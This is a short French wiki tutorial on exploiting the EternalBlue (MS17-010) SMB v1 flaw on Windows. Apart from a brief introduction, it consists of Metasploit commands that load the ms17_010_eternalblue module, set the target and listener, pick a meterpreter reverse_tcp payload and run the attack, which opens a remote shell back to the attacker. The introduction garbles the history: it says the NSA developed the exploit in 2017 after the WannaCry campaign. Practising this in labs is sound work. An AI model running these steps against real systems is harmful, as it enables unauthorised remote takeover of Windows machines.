# [Exploitation/Windows] Eternal Blue

## Introduction

L'exploit **Eternal Blue** a été développé par la NSA en 2017. Il fait suite à l'exploitation de la vulnérabilité **MS17-010** lors de la campagne de Ransomware Wannacry.

La faille est présente dans la v1 du protcole SMB et permet notamment une RCE.

[![image.png](https://wiki.neopipe.fr/uploads/images/gallery/2023-12/scaled-1680-/GP9image.png)](https://wiki.neopipe.fr/uploads/images/gallery/2023-12/GP9image.png)

## Exploitation avec Metasploit

- Tout d'abord lancez la console **Metasploit** :

```bash
msfconsole
```

- Sélectionnez l'exploit :

```bash
use exploit/windows/smb/ms17_010_eternalblue
```

- Définissez les options :

```bash
set rhosts <TARGET_IP>
```

```bash
set lhost <LOCAL_IP>
```

```bash
set lport <PORT>
```

```bash
set payload windows/x64/meterpreter/reverse_tcp
```

- Puis lancez l'exploit :

```bash
run
```